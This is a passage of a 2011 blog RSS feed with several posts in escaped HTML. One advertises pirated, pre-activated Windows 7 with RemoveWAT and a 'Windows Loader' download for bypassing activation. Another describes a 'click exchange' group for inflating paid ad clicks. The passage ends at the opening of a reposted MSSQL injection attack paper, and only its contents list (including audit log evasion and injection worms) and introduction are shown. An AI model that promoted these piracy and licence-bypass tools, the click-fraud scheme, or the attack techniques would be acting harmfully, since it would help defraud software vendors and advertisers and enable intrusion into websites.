src="https://lh3.googleusercontent.com/-Fty2BEoyUog/TX89skQhR4I/AAAAAAAAA7Q/PlRyWOe_K4I/s1600/mj.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Verify yourself by Completing the Survey&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-6127794371052849648?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/QPRho2dky-URnF9fUoAHlp2TCpI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QPRho2dky-URnF9fUoAHlp2TCpI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/QPRho2dky-URnF9fUoAHlp2TCpI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QPRho2dky-URnF9fUoAHlp2TCpI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/EtdbZmfHyxA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/EtdbZmfHyxA/real-michael-jackson-died-10-years-ago.html</link><author>noreply@blogger.com (ArtistAshish)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://lh3.googleusercontent.com/-Fty2BEoyUog/TX89skQhR4I/AAAAAAAAA7Q/PlRyWOe_K4I/s72-c/mj.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/03/real-michael-jackson-died-10-years-ago.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-5925770915906007973</guid><pubDate>Tue, 15 Mar 2011 09:40:00 +0000</pubDate><atom:updated>2011-03-15T02:40:22.273-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">service</category><category domain="http://www.blogger.com/atom/ns#">starter</category><category domain="http://www.blogger.com/atom/ns#">activation</category><category domain="http://www.blogger.com/atom/ns#">activated</category><category domain="http://www.blogger.com/atom/ns#">professional</category><category domain="http://www.blogger.com/atom/ns#">crack</category><category domain="http://www.blogger.com/atom/ns#">OEM</category><category domain="http://www.blogger.com/atom/ns#">SP1</category><category domain="http://www.blogger.com/atom/ns#">windows</category><category domain="http://www.blogger.com/atom/ns#">Adobe Premiere</category><category domain="http://www.blogger.com/atom/ns#">Ultimate</category><category domain="http://www.blogger.com/atom/ns#">1</category><category domain="http://www.blogger.com/atom/ns#">Links</category><category domain="http://www.blogger.com/atom/ns#">home</category><category domain="http://www.blogger.com/atom/ns#">seven</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">Pack</category><category domain="http://www.blogger.com/atom/ns#">Premium</category><category domain="http://www.blogger.com/atom/ns#">ownload</category><category domain="http://www.blogger.com/atom/ns#">7</category><title>DOWNLOAD Microsoft Windows 7™ SP1 RT</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;a href="http://lh5.googleusercontent.com/_KYCJiqetlTw/TXziBfG3JnI/AAAAAAAAASo/uQTzF4okawI/80a661.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://lh5.googleusercontent.com/_KYCJiqetlTw/TXziBfG3JnI/AAAAAAAAASo/uQTzF4okawI/80a661.jpg" width="400" /&gt;&lt;/a&gt;&lt;b&gt;Credit goes to the original uploader 'faXcooL' for this wonderful  share!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Windows  7 Service Pack 1(SP1) 32/64 Bit -PREACTIVATED&lt;/b&gt;&lt;br /&gt;32/64-BIT •  PREACTIVATED • BOOTABLE • UNTOUCHED • GENUINE • MULTILINGUAL • FULLY  UPDATABLE&lt;br /&gt;&lt;br /&gt;This release includes all available verisons of Windows  7 (except "N" and "E" editions)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://lh3.googleusercontent.com/_KYCJiqetlTw/TXziAe1RmYI/AAAAAAAAASY/QybPBuSMfJ8/7d8106.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="303" src="http://lh3.googleusercontent.com/_KYCJiqetlTw/TXziAe1RmYI/AAAAAAAAASY/QybPBuSMfJ8/7d8106.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;This DVD Includes :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="para"&gt;&lt;br /&gt;* Windows 7  Starter 32-bit&lt;br /&gt;* Windows 7 Home Basic 32/64-bit&lt;br /&gt;* Windows 7 Home  Premium 32/64-bit&lt;br /&gt;* Windows 7 Professional 32/64-bit&lt;br /&gt;* Windows 7  Enterprise 32/64-bit&lt;br /&gt;* Windows 7 Ultimate 32/64-bit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;Fits on a standard 4.7GB DVD&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://lh4.googleusercontent.com/_KYCJiqetlTw/TXziBjOZNLI/AAAAAAAAASs/yF9o4o1nzdg/s576/Capture-23.png%20" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="545" src="http://lh4.googleusercontent.com/_KYCJiqetlTw/TXziBjOZNLI/AAAAAAAAASs/yF9o4o1nzdg/s640/Capture-23.png%20" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Windows 7 Starter&lt;/span&gt;&lt;br /&gt;*********************&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="para"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh3.googleusercontent.com/_KYCJiqetlTw/TXzh-o1A5dI/AAAAAAAAASE/hnN0t47l_tY/01starter.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://lh3.googleusercontent.com/_KYCJiqetlTw/TXzh-o1A5dI/AAAAAAAAASE/hnN0t47l_tY/01starter.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Windows  7 Starter is the edition of Windows 7 that contains the fewest&lt;br /&gt;features.  Windows 7 Starter is only available in a 32-bit version. The Windows  Aero theme is not included in this version. The desktop wallpaper and  Visual Styles (Windows 7 Basic) are not user-changeable. Its functions  are very limited. Microsoft originally intended to restrict the edition  to running 3 simultaneous applications, but this limitation was dropped.  This edition is available pre-installed on computers, especially  netbooks, through system integrators or computer manufacturers using OEM  licences.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Windows 7 Home Basic&lt;/span&gt;&lt;br /&gt;**********************&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh4.googleusercontent.com/_KYCJiqetlTw/TXzh-qdNkLI/AAAAAAAAASA/DP9Wo19hmHw/02hbasic.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://lh4.googleusercontent.com/_KYCJiqetlTw/TXzh-qdNkLI/AAAAAAAAASA/DP9Wo19hmHw/02hbasic.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span id="goog_1341381484"&gt;&lt;/span&gt;&lt;span id="goog_1341381485"&gt;&lt;/span&gt;&lt;br /&gt;Windows  7 Home Basic is available in emerging markets such as Argentina,  Brazil, Chile, the People's Republic of China, Colombia, India,  Pakistan, Panama, Philippines, Mexico, Russia, Thailand, and Turkey. It  is not available in developed technology markets countries including in  Western and Central Europe, North America, Hong Kong, Australia and  Saudi Arabia. Some Aero options are excluded along with several new  features. Home Basic, along with other editions sold in emerging  markets, include geographical activation restriction, which requires  users to activate Windows within a certain region&lt;br /&gt;or country.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Windows 7 Home Premium&lt;/span&gt;&lt;br /&gt;**********************&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh4.googleusercontent.com/_KYCJiqetlTw/TXzh-3ZsPfI/AAAAAAAAASI/2qqLxuSzFps/03hprefff.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://lh4.googleusercontent.com/_KYCJiqetlTw/TXzh-3ZsPfI/AAAAAAAAASI/2qqLxuSzFps/03hprefff.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;This  edition contains features aimed at the home market segment, such as  Windows Media Center, Windows Aero and multi-touch support.&amp;nbsp;&lt;/div&gt;&lt;div class="para"&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Windows 7 Professional&lt;/span&gt;&lt;br /&gt;**********************&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh6.googleusercontent.com/_KYCJiqetlTw/TXzh_Ijhv_I/AAAAAAAAASM/fML_xrB9TJE/04pro.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://lh6.googleusercontent.com/_KYCJiqetlTw/TXzh_Ijhv_I/AAAAAAAAASM/fML_xrB9TJE/04pro.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="para"&gt;&lt;br /&gt;This  edition is targeted towards enthusiasts and small-business users. It  includes all the features of Windows 7 Home Premium, and adds the  ability to participate in a Windows Server domain. Additional features  include operating as a Remote Desktop server, location aware printing,  Encrypting File System, Presentation Mode, Software Restriction Policies  (but not the extra management features of AppLocker) and Windows XP  Mode. Like Enterprise, Microsoft will support this edition until 2020.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Windows 7 Enterprise&lt;/span&gt;&lt;br /&gt;**********************&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh3.googleusercontent.com/_KYCJiqetlTw/TXzh_Qg1ydI/AAAAAAAAASU/S2ypzxTEL2c/05enterpri.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://lh3.googleusercontent.com/_KYCJiqetlTw/TXzh_Qg1ydI/AAAAAAAAASU/S2ypzxTEL2c/05enterpri.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;This  edition targets the enterprise segment of the market and is sold  through volume licensing to companies which have a Software Assurance  contract with Microsoft. Additional features include support for  Multilingual User Interface (MUI) packages, BitLocker Drive Encryption,  and UNIX application support. Not available through retail or OEM  channels, this edition is distributed through Microsoft Software  Assurance (SA). As a result it includes several SA-only benefits,  including a license allowing the operating of diskless nodes (diskless  PCs), the running of multiple virtual machines, and activation via VLK.  Like Professional, Microsoft will support this edition until 2020.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Windows 7 Ultimate&lt;/span&gt;&lt;br /&gt;**********************&lt;/b&gt;&lt;br /&gt;&lt;div class="para"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh3.googleusercontent.com/_KYCJiqetlTw/TXzh_Vq1_-I/AAAAAAAAASQ/1mnxwBHj5PM/06ultimate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://lh3.googleusercontent.com/_KYCJiqetlTw/TXzh_Vq1_-I/AAAAAAAAASQ/1mnxwBHj5PM/06ultimate.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;Windows  7 Ultimate contains all of the same features as Windows 7 Enterprise,  but unlike the Enterprise edition, it is available to home users on an  individual license basis. Windows 7 Home Premium and Windows 7  Professional users are able to upgrade to Windows 7 Ultimate for a fee  using Windows Anytime Upgrade if they wish to do so. Unlike Windows  Vista Ultimate, the Windows 7 Ultimate edition does not include the  Windows Ultimate Extras feature or any exclusive features as Microsoft  had stated. However, even though it is the consumer equivalent to  Enterprise, Microsoft will only support Ultimate until 2015, as per Home  Premium.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;If you want to run Windows  7 on your PC, here's what it takes:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;1 gigahertz (GHz) or  faster 32-bit (x86) or 64-bit (x64) processor&lt;br /&gt;1 gigabyte (GB) RAM  (32-bit) or 2 GB RAM (64-bit&lt;br /&gt;16 GB available hard disk space (32-bit)  or 20 GB (64-bit)&lt;br /&gt;DirectX 9 graphics device with WDDM 1.0 or higher  driver&amp;nbsp;&lt;/div&gt;&lt;div class="para"&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;How to install :&lt;/span&gt;&lt;br /&gt;**************&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;-  Extract using WinRAR.&lt;br /&gt;- Use ImgBurn** to burn the extracted ISO file  called "&lt;b&gt;faXcooL.Windows.7.SP1.ENG.x86-x64.ACTiV&lt;wbr&gt;&lt;/wbr&gt;ATED&lt;/b&gt;"&lt;br /&gt;*  You can use any other software for this operation (Nero, Alcohol,  CloneCD...)&lt;br /&gt;* Burning speed should not be faster than 4x.&lt;br /&gt;-  Restart your computer*.&lt;br /&gt;* You can install it from existing OS, but  I'll recommend the clean installation.&lt;br /&gt;- Make sure you've seleceted  your DVD-ROM/RW drive as a first boot device (BIOS setup)*&lt;br /&gt;* If you  don't know how to do that, check &lt;a href="http://www.hiren.info/pages/bios-boot-cdrom"&gt;&lt;b&gt;this link&amp;nbsp;&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;-  The text message will appear "Press any key to boot from CD or DVD...."&lt;br /&gt;*  By pressing the key you're entering the setup.&lt;br /&gt;- Select your  language, time and currency and keyboard input (optionaly)&lt;br /&gt;- Click  "Install now".&lt;br /&gt;- Choose your edition* (x86 is 32-bit, x64 is 64-bit)  depending of CPU type you have.&lt;br /&gt;* Note that if you have less than 4GB  of RAM, x64 will be useless.&lt;br /&gt;- Click "I accept".&lt;br /&gt;- Click "Custom  (advanced).&lt;br /&gt;- Choose your partition/hdd drive where Win7 should be  installed and click format.&lt;br /&gt;* Setup will continue automaticly and it  will finish after 15-30 min.&lt;br /&gt;- Next step will be username (Image 17).&lt;br /&gt;-  Type your password (if you want).&lt;br /&gt;- Choose the third option for next  step.&lt;br /&gt;- Select your time zone.&lt;br /&gt;- Select your current location.&lt;br /&gt;-  And the last step will be silent auto-activation*&lt;br /&gt;* Your PC will  restart for the last time.&lt;br /&gt;&lt;br /&gt;And that would be all about  installation. You're in Windows now.&amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Activation&lt;/span&gt;&lt;br /&gt;**************&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;This  release has integrated RemoveWAT 2.2.6.0.&lt;br /&gt;This tool completely  removes Windows Activation Technologies from your sytem and your Windows  will be fully activated and fully updateable, plus, you won't have to  worry about malicious updates (i.e. KB971033) which can deactivate your  copy of Windows.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="font-size: 14px;"&gt;Hotfile-&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div style="background-color: #f9f9f9; border: 1px dashed rgb(47, 111, 171); padding: 5px;"&gt;&lt;pre style="font-size: 120%; margin: 0px; overflow: scroll; padding: 1em; width: 97%;"&gt;http://safelinking.net/&lt;wbr&gt;&lt;/wbr&gt;p/9d8bcbbaef&lt;/pre&gt;&lt;/div&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="font-size: 14px;"&gt;Fileserve-&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div style="background-color: #f9f9f9; border: 1px dashed rgb(47, 111, 171); padding: 5px;"&gt;&lt;pre style="font-size: 120%; margin: 0px; overflow: scroll; padding: 1em; width: 97%;"&gt;http://safelinkin&lt;wbr&gt;&lt;/wbr&gt;g.net/p/3aaf1c7863 &lt;/pre&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="font-size: 14px;"&gt;Before  Installing Microsoft Security Essentials run Windows Loader:-&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div style="background-color: #f9f9f9; border: 1px dashed rgb(47, 111, 171); padding: 5px;"&gt;&lt;pre style="font-size: 120%; margin: 0px; overflow: scroll; padding: 1em; width: 97%;"&gt;http://safelinking.net/p/90c819&lt;wbr&gt;&lt;/wbr&gt;126d&lt;/pre&gt;&lt;/div&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="font-size: 14px;"&gt;Premium Link  Generators-&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div style="background-color: #f9f9f9; border: 1px dashed rgb(47, 111, 171); padding: 5px;"&gt;&lt;pre style="font-size: 120%; margin: 0px; overflow: scroll; padding: 1em; width: 97%;"&gt;http://deamonleech.com/&lt;br /&gt;http:&lt;wbr&gt;&lt;/wbr&gt;//www.teraleech.com/&lt;/pre&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;b&gt;ENJOY..!&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-5925770915906007973?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/fiG_FAzTqgPIvAOU8FNbvULfcHM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fiG_FAzTqgPIvAOU8FNbvULfcHM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/fiG_FAzTqgPIvAOU8FNbvULfcHM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fiG_FAzTqgPIvAOU8FNbvULfcHM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/qZ2BW05qRbA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/qZ2BW05qRbA/download-microsoft-windows-7-sp1-rt.html</link><author>noreply@blogger.com (ArtistAshish)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://lh5.googleusercontent.com/_KYCJiqetlTw/TXziBfG3JnI/AAAAAAAAASo/uQTzF4okawI/s72-c/80a661.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/03/download-microsoft-windows-7-sp1-rt.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-3036766641733848889</guid><pubDate>Tue, 15 Mar 2011 09:26:00 +0000</pubDate><atom:updated>2011-03-15T02:26:37.968-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">legit</category><category domain="http://www.blogger.com/atom/ns#">tweet</category><category domain="http://www.blogger.com/atom/ns#">social</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">exchange</category><category domain="http://www.blogger.com/atom/ns#">Easy</category><category domain="http://www.blogger.com/atom/ns#">traffic</category><category domain="http://www.blogger.com/atom/ns#">money</category><category domain="http://www.blogger.com/atom/ns#">making</category><category domain="http://www.blogger.com/atom/ns#">link</category><category domain="http://www.blogger.com/atom/ns#">Free</category><category domain="http://www.blogger.com/atom/ns#">twitter</category><title>MyLikes Palringo- Make $$ with Twitter</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;MyLikes Palringo- Make $$ with Twitter&lt;br /&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;Q. What is Mylikes and how it works?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A. MyLikes is  word-of-mouth advertising platform that connects advertisers with  influencers on the web. Influencers can spread the word and earn  money.Here you'll connect campaigns i.e ads to your twitter/facebook  accounts and when people click the links.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="http://thenextweb.com/socialmedia/files/2010/04/twitter-logo.png" src="http://thenextweb.com/socialmedia/files/2010/04/twitter-logo.png" /&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;Q. Is it legit?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A. Yes, it is.Search google if you  dont believe me.I cant blog here.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;Q.How  do we make money?&lt;/span&gt;&lt;br /&gt;A."Click Exchange".And for this we have  made a Palringo group "Mylikes"&lt;br /&gt;&lt;span style="color: blue;"&gt;&lt;br /&gt;Q.What  do we need to do?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A. 1) dwnload palringo and Install it.&lt;br /&gt;2)  Signup on Mylikes.com&lt;br /&gt;3) Now join this group "Mylikes"&lt;br /&gt;4)Exchange  links with people online(without http://)&lt;br /&gt;5) Open Chrome in  Incognito window.&lt;br /&gt;6) Go to their profile and click the links with -AD  at their end&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-3036766641733848889?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/O6jigf-PyDDY-_ru0hLCFXr5a1s/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/O6jigf-PyDDY-_ru0hLCFXr5a1s/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/O6jigf-PyDDY-_ru0hLCFXr5a1s/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/O6jigf-PyDDY-_ru0hLCFXr5a1s/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/PhUHYOVEOes" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/PhUHYOVEOes/mylikes-palringo-make-with-twitter.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/03/mylikes-palringo-make-with-twitter.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-5943533768691944301</guid><pubDate>Fri, 04 Mar 2011 19:24:00 +0000</pubDate><atom:updated>2011-03-04T11:24:30.944-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">vulnerable</category><category domain="http://www.blogger.com/atom/ns#">breat</category><category domain="http://www.blogger.com/atom/ns#">sqli</category><category domain="http://www.blogger.com/atom/ns#">check</category><category domain="http://www.blogger.com/atom/ns#">website</category><category domain="http://www.blogger.com/atom/ns#">tutorial</category><category domain="http://www.blogger.com/atom/ns#">security</category><category domain="http://www.blogger.com/atom/ns#">SQL</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>SQL INJECTION TUTORIAL.. with Full Concepts and Details</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;pre&gt;|=--------------------------------------------------------------------=|&lt;br /&gt;  |=----------------=[  Full MSSQL Injection PWNage  ]=-----------------=|&lt;br /&gt;  |=-----------------------=[ 28 January 2009 ]=------------------------=|&lt;br /&gt;  |=---------------------=[  By CWH Underground  ]=---------------------=|&lt;br /&gt;  |=--------------------------------------------------------------------=|&lt;br /&gt;    &lt;br /&gt;&lt;br /&gt;######&lt;br /&gt; Info&lt;br /&gt;######&lt;br /&gt;&lt;br /&gt;Title : Full MSSQL Injection PWNage&lt;br /&gt;Author : ZeQ3uL &amp;amp;&amp;amp; JabAv0C&lt;br /&gt;Team    : CWH Underground [www.milw0rm.com/author/1456]&lt;br /&gt;Website : cwh.citec.us / www.citec.us&lt;br /&gt;Date : 2009-01-28&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;##########&lt;br /&gt; Contents&lt;br /&gt;##########&lt;br /&gt;&lt;br /&gt;  [0x00] - Introduction&lt;br /&gt;&lt;br /&gt;  [0x01] - Know the Basic of SQL injection&lt;br /&gt;&lt;br /&gt; [0x01a] - Introduction to SQL Injection Attack&lt;br /&gt; [0x01b] - How to Test sites that are Vulnerable in SQL Injection&lt;br /&gt; [0x01c] - Bypass Authentication with SQL Injection&lt;br /&gt; [0x01d] - Audit Log Evasion&lt;br /&gt; [0x01e] - (Perl Script) SQL-Google searching vulnerable sites &lt;br /&gt;&lt;br /&gt;  [0x02] - MSSQL Normal SQL Injection Attack&lt;br /&gt; &lt;br /&gt; [0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"&lt;br /&gt; [0x02b] - ODBC Error Message Attack with "CONVERT"&lt;br /&gt; [0x02c] - MSSQL Injection with UNION Attack&lt;br /&gt; [0x02d] - MSSQL Injection in Web Services (SOAP Injection)&lt;br /&gt;&lt;br /&gt;  [0x03] - MSSQL Blind SQL Injection Attack&lt;br /&gt; &lt;br /&gt; [0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection&lt;br /&gt; [0x03b] - Determine data through Blind SQL Injection&lt;br /&gt; [0x03c] - Exploit Query for get Table name &lt;br /&gt; [0x03d] - Exploit Query for get Column name&lt;br /&gt;&lt;br /&gt;  [0x04] - More Dangerous SQL Injection Attack&lt;br /&gt;&lt;br /&gt; [0x04a] - Dangerous from Extended Stored Procedures&lt;br /&gt; [0x04b] - Advanced SQL Injection Techniques&lt;br /&gt; [0x04c] - Mass MSSQL Injection Worms&lt;br /&gt;&lt;br /&gt;  [0x05] - MSSQL Injection Cheat Sheet&lt;br /&gt;&lt;br /&gt;  [0x06] - SQL Injection Countermeasures&lt;br /&gt;&lt;br /&gt;  [0x07] - References&lt;br /&gt;&lt;br /&gt;  [0x08] - Greetz To&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#######################&lt;br /&gt; [0x00] - Introduction&lt;br /&gt;#######################&lt;br /&gt;&lt;br /&gt; Welcome reader, this paper is a short attempt at documenting a practical technique &lt;br /&gt;we have been working on. This papers will guide about technique that allows the attackers &lt;br /&gt;(us) gaining access into the process of exploiting a website via SQL Injection Techniques&lt;br /&gt;that we focused on MSSQL only&lt;br /&gt;&lt;br /&gt; This paper is divided into 8 sections but only from section 0x01 to 0x06&lt;br /&gt;are about technical information.&lt;br /&gt;&lt;br /&gt; Section 0x01, we talk about basic knowledge of SQL injection vulnverabilities which&lt;br /&gt;are classified into two types, normal and blind. Section 0x02, we give a detail of each way &lt;br /&gt;attacking through SQL injection. Section 0x03, we explain the way to enumerate data through &lt;br /&gt;blind sql injection technique. Section 0x04, we show more dangerous approaches which can occur &lt;br /&gt;through SQL injection vulnerabilities. Section 0x05, we collect MSSQL queries in several purposes.&lt;br /&gt;Section 0x06, we offer some tips in order to prevent the system from SQL injection attack.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;##########################################&lt;br /&gt; [0x01] - Know the Basic of SQL injection&lt;br /&gt;##########################################&lt;br /&gt; &lt;br /&gt; SQL injection vulnerabilities occur when the database server can be made to execute arbitrary SQL &lt;br /&gt;(Structured Query Language) commands. Typically executed through the web application front end (use interface,&lt;br /&gt;form, etc.), the attack involves entering malformed or unexpected SQL statements which result in unauthorized&lt;br /&gt;execution of SQL commands on the database server.  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x01a] - Introduction to SQL Injection Attack&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt; &lt;br /&gt;  SQL injection attacks occur when malicious SQL commands are injected into a predefined 